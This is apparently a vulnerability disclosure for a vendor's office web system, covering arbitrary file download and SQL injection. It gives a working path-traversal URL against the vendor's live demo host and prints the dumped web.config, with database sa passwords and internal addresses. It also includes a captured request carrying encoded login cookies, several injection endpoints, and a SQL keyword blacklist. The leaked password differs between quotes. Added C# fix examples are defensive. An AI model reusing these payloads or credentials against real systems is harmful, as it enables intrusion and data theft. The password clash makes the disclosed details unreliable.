SQL Injection Vulnerability + Arbitrary File Download Vulnerability in N cyberspace office systems
1. Official product description:
http://www.isoffice.cn/Web/Index/WebDetail/customer
0x01 Arbitrary File Download Vulnerability (no login required)
Demonstration on the official website:
http://oa.isoffice.cn/FrmDownFile.aspx?FileOraName=1.txt&FileType=.txt&strName=../web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <configSections>
    <sectionGroup name="applicationSettings" type="System.Configuration.ApplicationSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
      <section name="SFOAV5._0.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false"/>
    </sectionGroup>
  </configSections>
  <appSettings>
    <add key="aspnet:MaxHttpCollectionKeys" value="5000"/>
    <add key="strConn" value="server=192.168.0.1;database=SFOAV5;uid=sa;pwd=123456"/>
    <add key="CASHost" value=""/>
    <add key="ServiceURL" value=""/>
    <add key="Filter" value="xp_-XP_$$sp_-SP_$$[ | |\)|\]|\']+(or)[ | |\(|\[|\']+- or $$[ | |\)|\]|\']+(and)[ | |\(|\[|\']+- and $$exec[ | |\[]+-exec $$dbcc[ | |\[]+-dbcc $$(alter[ | ])|([ | |\)|\]|\']alter[ | ])+-alter $$(drop[ | ])|([ | |\)|\]|\']drop[ | ])-drop $$(insert[ | ])|([ | |\)|\]|\']insert[ | ])-insert $$(update[ | |\[]+)|[ | |\)|\]|\']+(update[ | |\[]+)-update $$(delete[ | |\[]+)|([ | |\)|\]|\']delete[ | |\[]+)+-delete $$count-count$$master-master$$(truncate[ | ])|([ | |\)|\]|\']truncate[ | ])+-truncate $$char[ | ]+-char $$char\(-char($$declare[ | ]+-declare $$[ | |\)|\]]+where[ | |\(|\[]+-where $$set[ | |\[]+-set $$mid[ | |(]+-mid $$chr[ | |(]+-chr $$net[ | ]+-net $$backup[ | ]+-backup "/>
  </appSettings>
  <connectionStrings>
    <add name="strConn" connectionString="server=127.0.0.1;database=sfoav5;uid=sa;pwd=w@soffice86960316l"/>
    <add name="strConn2" connectionString=""/>
    <add name="MailType" connectionString="1"/>
    <add name="MailServer" connectionString="192.168.0.32"/>
    <add name="MailDNS" connectionString="202.101.224.68"/>
    <add name="MenuTech" connectionString="0"/>
    <!-- <add name="Control" connectionString="0"/> -->
    <add name="Store" connectionString="0"/>
    <add name="MenuUpload" connectionString="1"/>
    <add name="EpmSystem" connectionString="1"/>
    <add name="App" connectionString="0"/>
    <!-- <add name="Lite" connectionString="0"/> -->
    <add name="SunUrl" connectionString=""/>
  </connectionStrings>
  <system.web>
    <webServices>
      <protocols>
        <add name="HttpPost"/>
        <add name="HttpGet"/>
      </protocols>
    </webServices>
    <pages enableViewStateMac="false" enableEventValidation="false" validateRequest="false" controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID"/>
    <!-- Dynamic debugging compilation: set compilation debug="true" to enable ASPX debugging; otherwise setting it to false improves runtime performance.
         debug="true" inserts debugging symbols (.pdb information) into the compiled page. Because this creates a larger file that runs more slowly,
         set it to true only while debugging and to false in all other cases. For more information, see the documentation on debugging ASP.NET files. -->
    <compilation defaultLanguage="c#" debug="true" targetFramework="4.0"/>
    <!-- Custom error messages: set customErrors mode="On" or "RemoteOnly" to enable custom error messages, or "Off" to disable them.
         Add an <error> tag for each error to be handled. "On" always shows custom (friendly) messages. "Off" always shows detailed ASP.NET error messages.
         "RemoteOnly" shows custom (friendly) messages only to users not running on the local web server. For security reasons this setting is recommended,
         so that details about the application are not shown to remote clients. -->
    <customErrors mode="Off" defaultRedirect="SysError.aspx"/>
    <!-- Authentication: this section sets the authentication policy of the application. Possible modes are "Windows", "Forms", "Passport" and "None".
         "None": no authentication. "Windows": IIS authenticates according to the application's settings (basic, digest or integrated Windows);
         anonymous access must be disabled in IIS. "Forms": you provide a custom form (web page) for users to enter their credentials and then verify
         their identity in your application; user credentials are stored in a cookie. "Passport": authentication is performed through Microsoft's
         centralised authentication service, which provides single sign-on and core profile services for member sites. -->
    <!-- <identity impersonate="true" userName="iusr_pc2011042523oby" password="123456"/> -->
    <authentication mode="Windows"/>
    <!-- Authorization: this section sets the authorization policy of the application. Access to application resources can be allowed or denied
         for different users or roles. Wildcards: "*" means everyone, "?" means anonymous (unauthenticated) users. -->
    <authorization>
      <allow users="*"/> <!-- Allow all users -->
      <!-- <allow users="[comma-separated user list]" roles="[comma-separated role list]"/>
           <deny users="[comma-separated user list]" roles="[comma-separated role list]"/> -->
    </authorization>
    <!-- Application-level tracing: enables trace log output for every page of the application. Set trace enabled="true" to enable application tracing.
         If pageOutput="true", trace information is shown at the bottom of each page; otherwise the trace log can be viewed by browsing to the
         "trace.axd" page in the web application root directory. -->
    <trace enabled="false" requestLimit="10" pageOutput="false" traceMode="SortByTime" localOnly="true"/>
    <!-- Session state settings: by default ASP.NET uses cookies to identify which requests belong to a particular session. If cookies are unavailable,
         the session can be tracked by adding the session identifier to the URL. To disable cookies, set sessionState cookieless="true". -->
    <sessionState mode="InProc" stateConnectionString="tcpip=192.168.0.30:42424" sqlConnectionString="data source=192.168.0.30;trusted_Connection=yes" cookieless="false" timeout="20"/>
The database username and password can be read straight out of this file, which makes dumping the database trivial:
<add name="strConn" connectionString="server=127.0.0.1;database=sfoav5;uid=sa;pwd=w@soffice86960824l"/>
The line above is the database account and password. If the database port is reachable from outside, this credential can be used directly.
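What a fixed download handler looks like, written here as an added example (not the vendor's FrmDownFile.aspx, whose code is not shown on this page): the strName value is reduced to a bare file name and resolved inside one fixed directory, so a value such as ../web.config is refused. The directory name UploadFiles and the handler class name are assumptions.

```csharp
// Added example, not the vendor's code: a download handler that confines the
// requested name to one fixed directory and refuses anything that escapes it.
// Assumptions: files live under ~/UploadFiles; the handler is a plain
// System.Web.IHttpHandler mapped to a URL of your choice.
using System;
using System.IO;
using System.Web;
using System.Web.Hosting;

public class SafeDownloadHandler : IHttpHandler
{
    // Root directory every download is confined to, with a trailing separator
    // so that a sibling such as "UploadFiles2" cannot pass as a prefix of the root.
    private static readonly string Root =
        Path.GetFullPath(HostingEnvironment.MapPath("~/UploadFiles"))
            .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;

    // Returns the absolute path of the file to serve, or null when the request
    // contains directory components (e.g. "../web.config"), is empty, contains
    // invalid characters, or names a file that does not exist.
    public static string ResolveSafePath(string root, string requestedName)
    {
        if (string.IsNullOrEmpty(requestedName)) return null;
        try
        {
            // Only a bare file name is accepted; any path separator is rejected.
            string leaf = Path.GetFileName(requestedName);
            if (leaf.Length == 0 || leaf != requestedName) return null;
            string full = Path.GetFullPath(Path.Combine(root, leaf));
            // Defence in depth: the canonical path must still start with root.
            if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;
            return File.Exists(full) ? full : null;
        }
        catch (ArgumentException) { return null; }     // invalid path characters
        catch (NotSupportedException) { return null; } // e.g. a drive colon in the name
    }

    public void ProcessRequest(HttpContext ctx)
    {
        string path = ResolveSafePath(Root, ctx.Request.QueryString["strName"]);
        if (path == null)
        {
            ctx.Response.StatusCode = 404; // same answer for missing and forbidden
            return;
        }
        ctx.Response.ContentType = "application/octet-stream";
        ctx.Response.AppendHeader("Content-Disposition",
            "attachment; filename=\"" + Path.GetFileName(path) + "\"");
        ctx.Response.TransmitFile(path);
    }

    public bool IsReusable { get { return true; } }
}
```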
We can also see that an input filter is applied (the Filter key in appSettings):
<add key="Filter" value="xp_-XP_$$sp_-SP_$$[ | |\)|\]|\']+(or)[ | |\(|\[|\']+- or $$[ | |\)|\]|\']+(and)[ | |\(|\[|\']+- and $$exec[ | |\[]+-exec $$dbcc[ | |\[]+-dbcc $$(alter[ | ])|([ | |\)|\]|\']alter[ | ])+-alter $$(drop[ | ])|([ | |\)|\]|\']drop[ | ])-drop $$(insert[ | ])|([ | |\)|\]|\']insert[ | ])-insert $$(update[ | |\[]+)|[ | |\)|\]|\']+(update[ | |\[]+)-update $$(delete[ | |\[]+)|([ | |\)|\]|\']delete[ | |\[]+)+-delete $$count-count$$master-master$$(truncate[ | ])|([ | |\)|\]|\']truncate[ | ])+-truncate $$char[ | ]+-char $$char\(-char($$declare[ | ]+-declare $$[ | |\)|\]]+where[ | |\(|\[]+-where $$set[ | |\[]+-set $$mid[ | |(]+-mid $$chr[ | |(]+-chr $$net[ | ]+-net $$backup[ | ]+-backup " />
0x02 SQL injection (1)
GET /FrmMenuURL.aspx?ID=430 HTTP/1.1
Host: oa.isoffice.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.isoffice.cn/indexnew.aspx
Cookie: Hm_lvt_9f77501cb52bcbcaacbe546cf8ac3644=1411040329; UserName=dGVzdA%3D%3D%26; UserPwd=c29mZmljZQ%3D%3D%26; ASP.NET_SessionId=oclux2raem4tvc1ufab2v10a; SFOAUserCode=test; SFOAUserName=%b2%e2%ca%d4%d3%c3%bb%a7; SFOADeptName=%be%ad%c0%ed%b0%ec; SFOADeptID=1; SFOAWorker=%d7%dc%be%ad%c0%ed; SFOARoleID=81; SFOASysManager=; SFOAStyle=new; SFOAUserIkey=false; SFOAHeadColorR=198; SFOAHeadColorG=198; SFOAHeadColorB=198; SFOAMidColor=%23f0f0f0; SFOAMoveColor=%23e7e7e7; SFOAIPAddress=113.12.200.179; PageIndex=1; OrderInfo=; SFOA16Color=%23c6c6c6; Hm_lpvt_9f77501cb52bcbcaacbe546cf8ac3644=1411041098
Connection: keep-alive
0x02 SQL Injection
http://oa.isoffice.cn/AdverInfo/ShowAdverInfo.aspx?Id=1767
Because the program has its own filter and is additionally fronted by 360 web protection, the injection has to be bypassed before any data can be retrieved.
http://oa.isoffice.cn/WorkPlan/WaitingWork.aspx
http://oa.isoffice.cn/ExamInfo/PrintPaper.aspx?ID=17
Proof of vulnerability: the web.config retrieved above, including the database connection string:
<add name="strConn" connectionString="server=127.0.0.1;database=sfoav5;uid=sa;pwd=w@soffice86960824l"/>
Solution:
Strengthen input filtering.
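The Filter value shown earlier is a blacklist that rewrites SQL keywords inside the request; the durable fix is to keep request data out of the query text altogether. As an added example (not the vendor's code), here is the ID parameter of FrmMenuURL.aspx handled with a typed, parameterised query; the table and column names MenuTable, MenuID and MenuURL are assumptions, and the connection string is read from the strConn entry that web.config already defines.

```csharp
// Added example, not the vendor's code: replacing string concatenation plus
// the keyword-rewriting "Filter" with an integer parse and a bound parameter.
// Assumed schema: table MenuTable with columns MenuID (int) and MenuURL (string).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;

public static class MenuRepository
{
    // Step 1: the query-string value is parsed as a positive int before it gets
    // anywhere near SQL. Anything that is not a plain integer is rejected, so no
    // keyword list is needed and no rewriting can be worked around.
    public static bool TryParseId(string raw, out int id)
    {
        id = 0;
        return !string.IsNullOrEmpty(raw)
            && int.TryParse(raw.Trim(), out id)
            && id > 0;
    }

    // Step 2: the value is bound as a typed parameter; the SQL text is constant.
    public static string GetMenuUrl(string connectionString, int id)
    {
        const string sql = "SELECT MenuURL FROM MenuTable WHERE MenuID = @id";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            object result = cmd.ExecuteScalar();
            return result == null || result == DBNull.Value ? null : (string)result;
        }
    }

    // Entry point a page would call with Request.QueryString["ID"]: validate,
    // then query. Malformed input never reaches the database at all.
    public static string LookupFromRequest(string rawId)
    {
        int id;
        if (!TryParseId(rawId, out id)) return null;
        string cs = ConfigurationManager.ConnectionStrings["strConn"].ConnectionString;
        return GetMenuUrl(cs, id);
    }
}
```

Note that this also removes the need for the sa account in the connection string: the application login only needs SELECT on the tables it actually reads.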